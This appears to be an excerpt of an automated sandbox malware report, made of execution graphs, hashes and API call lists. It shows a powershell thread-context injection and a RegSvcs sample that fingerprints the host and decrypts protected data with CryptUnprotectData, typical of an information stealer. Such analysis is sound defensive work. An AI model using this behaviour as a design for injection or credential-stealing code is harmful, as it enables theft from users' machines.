                                                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:1.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:7
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 6697 7ffd9b8aef08 6698 7ffd9b8aeeca 6697->6698 6698->6697 6699 7ffd9b8aef7a ResumeThread 6698->6699 6700 7ffd9b8aefa6 6699->6700 6693 7ffd9b8af550 6694 7ffd9b8af597 Wow64SetThreadContext 6693->6694 6696 7ffd9b8af654 6694->6696
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1915337032.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b970000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51a84bb01b8ebdf4c904049c9b46b2b6fc68e47755cbe9b99c8a987d200cbc58
                                                                      • Instruction ID: 3bea2991dd00c730d17225c36e62adf9d5616f461c08c42c46d6a42c9aa563b8
                                                                      • Opcode Fuzzy Hash: 51a84bb01b8ebdf4c904049c9b46b2b6fc68e47755cbe9b99c8a987d200cbc58
                                                                      • Instruction Fuzzy Hash: A7C26B22B1EB991FE76A876858A55B43FE1EF56314B0A01FFD04DC71E3DE18AD068341

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 310 7ffd9b8af364-7ffd9b8af3a2 311 7ffd9b8af3a8-7ffd9b8af3ba 310->311 312 7ffd9b8af534-7ffd9b8af544 310->312 311->312 313 7ffd9b8af3c0-7ffd9b8af3d7 311->313 318 7ffd9b8af546-7ffd9b8af548 312->318 319 7ffd9b8af54a 312->319 313->312 315 7ffd9b8af3dd-7ffd9b8af3f2 313->315 315->312 317 7ffd9b8af3f8-7ffd9b8af427 315->317 317->312 320 7ffd9b8af42d-7ffd9b8af43e 317->320 318->319 321 7ffd9b8af54c-7ffd9b8af60d 318->321 319->321 320->312 322 7ffd9b8af444-7ffd9b8af45a 320->322 331 7ffd9b8af617-7ffd9b8af61c 321->331 332 7ffd9b8af60f-7ffd9b8af614 321->332 322->312 324 7ffd9b8af460-7ffd9b8af475 322->324 324->312 326 7ffd9b8af47b-7ffd9b8af49e 324->326 326->312 333 7ffd9b8af623-7ffd9b8af652 Wow64SetThreadContext 331->333 332->331 334 7ffd9b8af65a-7ffd9b8af689 333->334 335 7ffd9b8af654 333->335 335->334
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24a802e97c086bfce3d82f8b3611eae9d6eb1fc19b4212acd4c71ac7919d5823
                                                                      • Instruction ID: 74aeaa5950df8c515861a8e2e3f1de1805ab6266356497f0bf726d15c737a608
                                                                      • Opcode Fuzzy Hash: 24a802e97c086bfce3d82f8b3611eae9d6eb1fc19b4212acd4c71ac7919d5823
                                                                      • Instruction Fuzzy Hash: 73915531E0D7980FD72A5F6C18650B47BE1EF9A301B1542BED8CAC75A3D928E90BC791

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 337 7ffd9b8af13f-7ffd9b8af1b1 339 7ffd9b8af1b7-7ffd9b8af1c8 337->339 340 7ffd9b8af534-7ffd9b8af544 337->340 339->340 341 7ffd9b8af1ce-7ffd9b8af1e5 339->341 346 7ffd9b8af546-7ffd9b8af548 340->346 347 7ffd9b8af54a 340->347 341->340 343 7ffd9b8af1eb-7ffd9b8af200 341->343 343->340 345 7ffd9b8af206-7ffd9b8af22e 343->345 345->340 346->347 348 7ffd9b8af54c-7ffd9b8af60d 346->348 347->348 355 7ffd9b8af617-7ffd9b8af61c 348->355 356 7ffd9b8af60f-7ffd9b8af614 348->356 357 7ffd9b8af623-7ffd9b8af652 Wow64SetThreadContext 355->357 356->355 358 7ffd9b8af65a-7ffd9b8af689 357->358 359 7ffd9b8af654 357->359 359->358
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b03d3c358b08162aab63b5251984efae9ae03b72402ce1fac0d5278f49cc4cca
                                                                      • Instruction ID: 651afeb85d467e77b2491777b9ca5e92d30605ea935851fc30ec2fee1a6ad5db
                                                                      • Opcode Fuzzy Hash: b03d3c358b08162aab63b5251984efae9ae03b72402ce1fac0d5278f49cc4cca
                                                                      • Instruction Fuzzy Hash: AD713831A0D7880FD72E9FA858651B87FE1DF5B311B1942BFD0CAC75A3D928A8078761

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 361 7ffd9b8af550-7ffd9b8af60d 366 7ffd9b8af617-7ffd9b8af652 Wow64SetThreadContext 361->366 367 7ffd9b8af60f-7ffd9b8af614 361->367 369 7ffd9b8af65a-7ffd9b8af689 366->369 370 7ffd9b8af654 366->370 367->366 370->369
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: dc27bee49e3c66576a9ebd775b71d7ad5aaf8ede347a4d9e09e7f9822c072e99
                                                                      • Instruction ID: 8933236326b4ffbdb95bcb75e99fca7aa811eb59cb80497b83106c98fc6b15b0
                                                                      • Opcode Fuzzy Hash: dc27bee49e3c66576a9ebd775b71d7ad5aaf8ede347a4d9e09e7f9822c072e99
                                                                      • Instruction Fuzzy Hash: 0A41F83190D7884FD72A9BB898256E97FF0EF57311F0941EFD089C71A3DA28580AC751

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 372 7ffd9b8aef08-7ffd9b8aef19 373 7ffd9b8aef1b-7ffd9b8aef73 372->373 374 7ffd9b8aeeca-7ffd9b8aeefe 372->374 379 7ffd9b8aef7a-7ffd9b8aefa4 ResumeThread 373->379 374->372 380 7ffd9b8aefa6 379->380 381 7ffd9b8aefac-7ffd9b8aefd1 379->381 380->381
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 674a0ff9132222426b1662353d568531bf829c6b8d7836aa88aad8ce8eacea4e
                                                                      • Instruction ID: 44d276bdf2eac896f7c488c6ea39626b7d03b8542c9162ec13a4906a80778226
                                                                      • Opcode Fuzzy Hash: 674a0ff9132222426b1662353d568531bf829c6b8d7836aa88aad8ce8eacea4e
                                                                      • Instruction Fuzzy Hash: ED310731A0CB4C4FDB59DFA88855BE97BE0EF6A310F0441AFD049CB1A3DA649815C751
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1915337032.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b970000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62fe7a29f0f4aa0b680668c8ddd58887521e76e1d0642954d8ae1de208b216e0
                                                                      • Instruction ID: 8ea62b774656671ed894d6cf3d1a1f5f1f8af76cb920cd7fffc0e4e6bf7980be
                                                                      • Opcode Fuzzy Hash: 62fe7a29f0f4aa0b680668c8ddd58887521e76e1d0642954d8ae1de208b216e0
                                                                      • Instruction Fuzzy Hash: E5512621B1EA9E1FEBA9CAA844F46747BE1EF55204B1A01FBD44DC71E3DE18ED058381
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |
                                                                      • API String ID: 0-2343686810
                                                                      • Opcode ID: acaff653d011061b7e034a908b04ae87a4f3fc59ab2ad1a79be6cb32c8e28807
                                                                      • Instruction ID: db2a1e9ce6052d755e8795b80ec851ce4a266522e134d8c0f299ce7c17bfb671
                                                                      • Opcode Fuzzy Hash: acaff653d011061b7e034a908b04ae87a4f3fc59ab2ad1a79be6cb32c8e28807
                                                                      • Instruction Fuzzy Hash: 05421870B0DA4D8FE775DB68C8616B87BE1EF5A310F1601BAD04DC72EADE28A905C750
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2fe5ece5d45f7bb0024da19daa16bcf13a4a310c7b5bc49875b9c41b8eff8a2
                                                                      • Instruction ID: 038f7601326f5f21132d7fd93c8db319bd85ad5eb25a072a252c03343c22667d
                                                                      • Opcode Fuzzy Hash: f2fe5ece5d45f7bb0024da19daa16bcf13a4a310c7b5bc49875b9c41b8eff8a2
                                                                      • Instruction Fuzzy Hash: 34318A7270D24D0FD76C9E689C66572B791EBAA310F06427FE08AC35E3DD2468038391
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1914827171.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06f32fdb22d229d2da0c1a818af1290b0a4720e0ee5b5872530bc4004965d1ef
                                                                      • Instruction ID: d0877a7809c60ad07adfe524cf08262e7eb491e915653e11255687482b8a90bd
                                                                      • Opcode Fuzzy Hash: 06f32fdb22d229d2da0c1a818af1290b0a4720e0ee5b5872530bc4004965d1ef
                                                                      • Instruction Fuzzy Hash: 4921796170D68D1FE36C9F684C66573BBA6EB9A210F15437EE0DAC31A3DD2468438292

                                                                      Execution Graph

                                                                      Execution Coverage:8.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:47.7%
                                                                      Total number of Nodes:327
                                                                      Total number of Limit Nodes:19
                                                                      execution_graph 13905 408740 13907 40874f 13905->13907 13906 408a02 ExitProcess 13907->13906 13908 408764 GetCurrentProcessId GetCurrentThreadId 13907->13908 13909 4089eb 13907->13909 13911 40878a 13908->13911 13912 40878e SHGetSpecialFolderPathW GetForegroundWindow 13908->13912 13923 440240 13909->13923 13911->13912 13913 408858 13912->13913 13917 43e840 13913->13917 13915 408969 13915->13909 13920 40b5d0 FreeLibrary 13915->13920 13926 441860 13917->13926 13919 43e84a RtlAllocateHeap 13919->13915 13921 40b5ec 13920->13921 13922 40b5f1 FreeLibrary 13921->13922 13922->13909 13928 441840 13923->13928 13925 440245 FreeLibrary 13925->13906 13927 441880 13926->13927 13927->13919 13927->13927 13929 441849 13928->13929 13929->13925 13930 41fd40 13931 41fda8 13930->13931 13932 41fd4e 13930->13932 13936 41fe70 13932->13936 13934 41fe2c 13934->13931 13935 41e250 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 13934->13935 13935->13931 13937 41fe80 13936->13937 13937->13937 13940 443390 13937->13940 13939 41ff6f 13941 4433b0 13940->13941 13942 44349e 13941->13942 13944 4402d0 LdrInitializeThunk 13941->13944 13942->13939 13944->13942 14186 40d082 14187 40d090 14186->14187 14190 43b7b0 14187->14190 14189 40d118 14189->14189 14191 43b7e0 14190->14191 14191->14191 14192 43bb0b CoCreateInstance 14191->14192 14193 43bb65 SysAllocString 14192->14193 14194 43c09e 14192->14194 14198 43bc06 14193->14198 14195 43c0ae GetVolumeInformationW 14194->14195 14197 43c0cc 14195->14197 14197->14189 14199 43bc0e CoSetProxyBlanket 14198->14199 14200 43c08d SysFreeString 14198->14200 14201 43c083 14199->14201 14202 43bc2e SysAllocString 14199->14202 14200->14194 14201->14200 14204 43bcf0 14202->14204 14204->14204 14205 43bd1c SysAllocString 14204->14205 14208 43bd41 14205->14208 14206 43c06d SysFreeString SysFreeString 14206->14201 14207 43c063 14207->14206 14208->14206 14208->14207 14209 43bd85 VariantInit 14208->14209 14211 43bdd0 14209->14211 14210 43c052 VariantClear 14210->14207 14211->14210 13945 440f47 13947 440e70 13945->13947 13948 440e7e 13945->13948 13946 440ece 13947->13948 13952 4402d0 LdrInitializeThunk 13947->13952 13948->13946 13951 4402d0 LdrInitializeThunk 13948->13951 13951->13946 13952->13948 13953 40cb44 CoInitializeSecurity CoInitializeSecurity 14212 443580 14213 4435bf 14212->14213 14214 443599 14212->14214 14214->14213 14218 4402d0 LdrInitializeThunk 14214->14218 14216 4435e8 14216->14213 14219 4402d0 LdrInitializeThunk 14216->14219 14218->14216 14219->14213 14220 418404 14221 4183e3 14220->14221 14222 4183d1 14220->14222 14221->14222 14224 4183eb CryptUnprotectData 14221->14224 14225 418416 14221->14225 14223 4183e4 CryptUnprotectData 14222->14223 14224->14220 14225->14222 14227 418418 14225->14227 14226 41aa90 4 API calls 14226->14227 14227->14226 14228 4184b7 14227->14228 14229 41aa90 4 API calls 14228->14229 14230 41853c 14229->14230 13954 423e44 13955 423e4b 13954->13955 13956 423e5b RtlExpandEnvironmentStrings 13955->13956 13957 423e7c 13956->13957 13957->13957 13958 443390 LdrInitializeThunk 13957->13958 13960 423f71 13958->13960 13959 423f84 13962 443390 LdrInitializeThunk 13959->13962 13960->13959 13963 424241 13960->13963 13965 420440 13960->13965 13962->13963 13963->13963 13964 443390 LdrInitializeThunk 13963->13964 13964->13963 13980 443230 13965->13980 13967 420a26 13967->13959 13968 420480 13968->13967 13969 43e840 RtlAllocateHeap 13968->13969 13970 4204e2 13969->13970 13976 4204f9 13970->13976 13984 4402d0 LdrInitializeThunk 13970->13984 13972 420a08 13973 43e860 RtlFreeHeap 13972->13973 13975 420a18 13973->13975 13974 43e840 RtlAllocateHeap 13974->13976 13975->13967 13990 4402d0 LdrInitializeThunk 13975->13990 13976->13972 13976->13974 13985 4402d0 LdrInitializeThunk 13976->13985 13986 43e860 13976->13986 13982 443250 13980->13982 13981 44333e 13981->13968 13982->13981 13991 4402d0 LdrInitializeThunk 13982->13991 13984->13970 13985->13976 13987 43e873 13986->13987 13988 43e892 13986->13988 13989 43e878 RtlFreeHeap 13987->13989 13988->13976 13989->13988 13990->13975 13991->13981 13992 432d44 13993 432d4b VariantInit 13992->13993 13994 432cd8 13992->13994 13995 432ddf 13993->13995 13996 410446 13997 410463 13996->13997 13998 4107fe RtlExpandEnvironmentStrings 13997->13998 13999 40e863 13997->13999 13998->13999 14000 42f3c5 14001 42f3d5 14000->14001 14002 42f4eb GetComputerNameExA 14001->14002 14231 440a0d 14232 440a17 14231->14232 14235 440afe 14232->14235 14238 4402d0 LdrInitializeThunk 14232->14238 14234 440c1e 14235->14234 14237 4402d0 LdrInitializeThunk 14235->14237 14237->14234 14238->14235 14003 432648 CoSetProxyBlanket 14004 417451 14011 41745a 14004->14011 14005 417671 14012 4171a0 14005->14012 14026 4402d0 LdrInitializeThunk 14005->14026 14006 417416 14009 4173bd 14014 41aa90 14009->14014 14010 4402d0 LdrInitializeThunk 14010->14011 14011->14005 14011->14006 14011->14010 14011->14012 14012->14006 14012->14009 14012->14012 14013 443390 LdrInitializeThunk 14012->14013 14013->14012 14015 41aac0 14014->14015 14015->14015 14027 413e50 14015->14027 14018 413e50 4 API calls 14019 41ac6d 14018->14019 14020 413e50 4 API calls 14019->14020 14021 41ad1a 14020->14021 14022 413e50 4 API calls 14021->14022 14023 41adc9 14022->14023 14024 413e50 4 API calls 14023->14024 14025 41ae40 14024->14025 14025->14006 14026->14012 14029 413e70 14027->14029 14028 443230 LdrInitializeThunk 14031 413f7f 14028->14031 14029->14028 14030 443230 LdrInitializeThunk 14030->14031 14031->14030 14032 41423d 14031->14032 14033 4145fd 14031->14033 14048 414186 14031->14048 14054 41427e 14031->14054 14041 43e840 RtlAllocateHeap 14032->14041 14040 43e860 RtlFreeHeap 14033->14040 14034 41468a 14037 414799 14034->14037 14034->14048 14049 4147c4 14034->14049 14105 4434f0 14034->14105 14035 414742 14035->14034 14036 414764 14035->14036 14035->14037 14045 443230 LdrInitializeThunk 14035->14045 14035->14048 14035->14049 14101 43ec10 14036->14101 14037->14048 14037->14049 14109 443580 14037->14109 14038 41462e 14038->14034 14038->14035 14038->14036 14038->14037 14039 414724 14038->14039 14038->14048 14038->14049 14079 43e8a0 14038->14079 14039->14034 14039->14035 14039->14036 14039->14037 14039->14048 14039->14049 14093 43ec70 14039->14093 14055 414603 14040->14055 14056 414247 14041->14056 14045->14036 14048->14018 14049->14048 14115 4402d0 LdrInitializeThunk 14049->14115 14053 4402d0 LdrInitializeThunk 14053->14054 14054->14033 14054->14034 14054->14035 14054->14036 14054->14037 14054->14038 14054->14039 14054->14048 14054->14049 14054->14053 14061 43c410 14054->14061 14055->14038 14078 4402d0 LdrInitializeThunk 14055->14078 14056->14054 14060 4402d0 LdrInitializeThunk 14056->14060 14060->14054 14063 43c420 14061->14063 14067 43c4e2 14063->14067 14116 440260 14063->14116 14125 4402d0 LdrInitializeThunk 14063->14125 14065 43c7ab 14066 43e860 RtlFreeHeap 14065->14066 14068 43c7c3 14066->14068 14067->14065 14069 43eb00 LdrInitializeThunk 14067->14069 14068->14054 14075 43c528 14069->14075 14070 43c7af 14071 43ec10 LdrInitializeThunk 14070->14071 14071->14065 14072 4402d0 LdrInitializeThunk 14072->14075 14073 440260 3 API calls 14073->14075 14074 43e860 RtlFreeHeap 14074->14075 14075->14070 14075->14072 14075->14073 14075->14074 14076 43c7d0 14075->14076 14077 43e860 RtlFreeHeap 14076->14077 14077->14070 14078->14038 14080 43e8de 14079->14080 14081 43e8c2 14079->14081 14083 43e840 RtlAllocateHeap 14080->14083 14085 414718 14080->14085 14081->14080 14126 4402d0 LdrInitializeThunk 14081->14126 14086 43e9a9 14083->14086 14084 43e860 RtlFreeHeap 14084->14085 14089 43eb00 14085->14089 14088 43e9de 14086->14088 14127 4402d0 LdrInitializeThunk 14086->14127 14088->14084 14090 43eb7e 14089->14090 14091 43eb0d 14089->14091 14090->14039 14091->14090 14128 4402d0 LdrInitializeThunk 14091->14128 14094 43ec82 14093->14094 14095 43ecae 14093->14095 14094->14095 14129 4402d0 LdrInitializeThunk 14094->14129 14095->14035 14097 43ed1e 14098 43ed7e 14097->14098 14130 4402d0 LdrInitializeThunk 14097->14130 14098->14095 14131 4402d0 LdrInitializeThunk 14098->14131 14102 43ec16 14101->14102 14104 43ec3e 14101->14104 14102->14104 14132 4402d0 LdrInitializeThunk 14102->14132 14104->14034 14106 44352e 14105->14106 14107 44350e 14105->14107 14106->14037 14107->14106 14133 4402d0 LdrInitializeThunk 14107->14133 14110 4435bf 14109->14110 14111 443599 14109->14111 14110->14049 14111->14110 14134 4402d0 LdrInitializeThunk 14111->14134 14113 4435e8 14113->14110 14135 4402d0 LdrInitializeThunk 14113->14135 14115->14048 14117 4402a5 14116->14117 14118 440278 14116->14118 14119 44029a 14116->14119 14120 440286 14116->14120 14124 4402a0 14116->14124 14122 43e860 RtlFreeHeap 14117->14122 14118->14117 14118->14120 14118->14124 14121 43e840 RtlAllocateHeap 14119->14121 14123 44028b RtlReAllocateHeap 14120->14123 14121->14124 14122->14124 14123->14124 14124->14063 14125->14063 14126->14080 14127->14088 14128->14090 14129->14097 14130->14098 14131->14095 14132->14104 14133->14106 14134->14113 14135->14110 14136 4408d4 14137 4408f0 14136->14137 14139 44097e 14137->14139 14140 4402d0 LdrInitializeThunk 14137->14140 14140->14139 14239 40d690 14244 436590 14239->14244 14241 40d696 14242 40d6a0 CoUninitialize 14241->14242 14243 40d6c0 14242->14243 14245 4365be GetSystemMetrics GetSystemMetrics 14244->14245 14246 4365fb DeleteObject 14245->14246 14248 436648 SelectObject 14246->14248 14250 4366c0 SelectObject 14248->14250 14251 4366dd DeleteObject 14250->14251 14141 42ecd0 14142 42ecda 14141->14142 14143 42eda9 GetPhysicallyInstalledSystemMemory 14142->14143 14144 42edd0 14143->14144 14144->14144 14253 42f596 14255 42f5ac 14253->14255 14254 42f61b GetComputerNameExA 14255->14254 14255->14255 14256 40d51b 14258 40d544 14256->14258 14259 40d527 14256->14259 14257 40d58e 14278 423d10 14257->14278 14258->14257 14283 4402d0 LdrInitializeThunk 14258->14283 14259->14258 14282 4402d0 LdrInitializeThunk 14259->14282 14263 40d5c6 14264 4245c0 6 API calls 14263->14264 14265 40d5e2 14264->14265 14266 424830 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14265->14266 14267 40d5fe 14266->14267 14268 4270d0 LdrInitializeThunk 14267->14268 14269 40d61a 14268->14269 14270 427a50 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14269->14270 14271 40d623 14270->14271 14272 427eb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14271->14272 14273 40d62c 14272->14273 14274 42a810 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14273->14274 14275 40d635 14274->14275 14276 4363e0 6 API calls 14275->14276 14277 40d676 14276->14277 14279 423d70 14278->14279 14279->14279 14280 423da4 RtlExpandEnvironmentStrings 14279->14280 14281 423df0 14280->14281 14281->14281 14282->14258 14283->14257 14145 40ae60 14146 40aef0 14145->14146 14146->14146 14147 40af15 14146->14147 14148 440260 3 API calls 14146->14148 14148->14146 14284 42d420 14286 42d450 14284->14286 14285 42d4fe 14286->14285 14288 4402d0 LdrInitializeThunk 14286->14288 14288->14285 14149 442460 14150 442480 14149->14150 14152 442565 14150->14152 14159 4402d0 LdrInitializeThunk 14150->14159 14151 44273f 14152->14151 14154 43e840 RtlAllocateHeap 14152->14154 14155 4425e5 14154->14155 14158 44267a 14155->14158 14160 4402d0 LdrInitializeThunk 14155->14160 14156 43e860 RtlFreeHeap 14156->14151 14158->14156 14159->14152 14160->14158 14289 40c9a6 CoInitializeEx CoInitializeEx 14290 4406a2 GetForegroundWindow 14294 4421b0 14290->14294 14292 4406ae GetForegroundWindow 14293 4406bd 14292->14293 14295 4421c6 14294->14295 14295->14292 14173 4358ef 14176 413e40 14173->14176 14175 4358f4 CoSetProxyBlanket 14176->14175 14177 4406f4 14178 440715 14177->14178 14180 44073e 14177->14180 14178->14180 14181 4402d0 LdrInitializeThunk 14178->14181 14181->14180 14296 43b5b0 14299 43b5d5 14296->14299 14298 43b747 14301 43b60d 14299->14301 14305 4402d0 LdrInitializeThunk 14299->14305 14301->14298 14302 43b69f 14301->14302 14304 4402d0 LdrInitializeThunk 14301->14304 14302->14298 14306 4402d0 LdrInitializeThunk 14302->14306 14304->14301 14305->14299 14306->14302 14182 43aa74 14183 43aa8c 14182->14183 14184 43aaaf GetUserDefaultUILanguage 14183->14184 14185 43aad6 14184->14185 14307 440e39 14308 440e5d 14307->14308 14310 440d73 14307->14310 14309 440dae 14310->14309 14312 4402d0 LdrInitializeThunk 14310->14312 14312->14309

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 43b7b0-43b7d5 1 43b7e0-43b816 0->1 1->1 2 43b818-43b82e 1->2 3 43b830-43b84a 2->3 3->3 4 43b84c-43b88f 3->4 5 43b890-43b8c3 4->5 5->5 6 43b8c5-43b8df 5->6 8 43b9b0-43b9b8 6->8 9 43b8e5-43b8ef 6->9 10 43b9c0-43b9d7 8->10 11 43b8f0-43b938 9->11 10->10 12 43b9d9-43ba2f 10->12 11->11 13 43b93a-43b94b 11->13 15 43ba30-43ba63 12->15 14 43b950-43b9a1 13->14 14->14 16 43b9a3-43b9ac 14->16 15->15 17 43ba65-43bab1 15->17 16->8 18 43bac0-43bb09 17->18 18->18 19 43bb0b-43bb5f CoCreateInstance 18->19 20 43bb65-43bb95 19->20 21 43c09e-43c0ca call 441c60 GetVolumeInformationW 19->21 23 43bba0-43bbdd 20->23 26 43c0d3-43c0d5 21->26 27 43c0cc-43c0cf 21->27 23->23 25 43bbdf-43bc08 SysAllocString 23->25 32 43bc0e-43bc28 CoSetProxyBlanket 25->32 33 43c08d-43c09a SysFreeString 25->33 28 43c0ed-43c0f4 26->28 27->26 30 43c100-43c119 28->30 31 43c0f6-43c0fd 28->31 34 43c120-43c138 30->34 31->30 35 43c083-43c089 32->35 36 43bc2e-43bc43 32->36 33->21 34->34 38 43c13a-43c16f 34->38 35->33 37 43bc50-43bc62 36->37 37->37 39 43bc64-43bce1 SysAllocString 37->39 40 43c170-43c1a6 38->40 41 43bcf0-43bd1a 39->41 40->40 42 43c1a8-43c1d7 call 41c7d0 40->42 41->41 43 43bd1c-43bd43 SysAllocString 41->43 46 43c1e0-43c1e8 42->46 49 43bd49-43bd6b 43->49 50 43c06d-43c07f SysFreeString * 2 43->50 46->46 48 43c1ea-43c1ec 46->48 51 43c1f2-43c202 call 408120 48->51 52 43c0e0-43c0e7 48->52 57 43c063-43c069 49->57 58 43bd71-43bd74 49->58 50->35 51->52 52->28 54 43c207-43c20e 52->54 57->50 58->57 59 43bd7a-43bd7f 58->59 59->57 60 43bd85-43bdcf VariantInit 59->60 61 43bdd0-43be02 60->61 61->61 62 43be04-43be19 61->62 63 43be1d-43be1f 62->63 64 43c052-43c05f VariantClear 63->64 65 43be25-43be2e 63->65 64->57 65->64 66 43be34-43be41 65->66 67 43be43-43be4a 66->67 68 43be87-43be89 66->68 69 43be66-43be6a 67->69 70 43be8b-43bea5 call 407f80 68->70 71 43be50-43be58 69->71 72 43be6c-43be75 69->72 79 43beab-43beb7 70->79 80 43c00a-43c021 70->80 74 43be5b-43be64 71->74 75 43be77-43be7a 72->75 76 43be7c-43be80 72->76 74->69 74->70 75->74 76->74 78 43be82-43be85 76->78 78->74 79->80 83 43bebd-43bec5 79->83 81 43c023-43c02d 80->81 82 43c042-43c04b call 407f90 80->82 81->82 85 43c02f-43c039 81->85 82->64 84 43bed0-43beda 83->84 87 43bef0-43bef6 84->87 88 43bedc-43bee1 84->88 85->82 89 43c03b-43c03e 85->89 92 43bf18-43bf28 87->92 93 43bef8-43befb 87->93 91 43bfa0-43bfaa 88->91 89->82 97 43bfac-43bfb2 91->97 95 43bfbe-43bfc7 92->95 96 43bf2e-43bf31 92->96 93->92 94 43befd-43bf13 93->94 94->91 100 43bfd1-43bfd4 95->100 101 43bfc9-43bfcf 95->101 96->95 98 43bf37-43bf9a 96->98 97->80 99 43bfb4-43bfb6 97->99 98->91 99->84 102 43bfbc 99->102 103 43c006-43c008 100->103 104 43bfd6-43c004 100->104 101->97 102->80 103->91 104->91
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(7F7E7D64,00000000,00000001,D3D2D1DD,00000000,?,D3D2D1DD,?,?,?), ref: 0043BB57
                                                                      • SysAllocString.OLEAUT32 ref: 0043BBE2
                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,D3D2D1DD,?,?,?), ref: 0043BC20
                                                                      • SysAllocString.OLEAUT32 ref: 0043BC67
                                                                      • SysAllocString.OLEAUT32 ref: 0043BD1F
                                                                      • VariantInit.OLEAUT32(?), ref: 0043BD8D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                      • String ID: ./$qn
                                                                      • API String ID: 65563702-3823645636
                                                                      • Opcode ID: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
                                                                      • Instruction ID: 2f0884b81ea7a4518840af457542ae1764f48caff3a768fe7da6a1d928f758ff
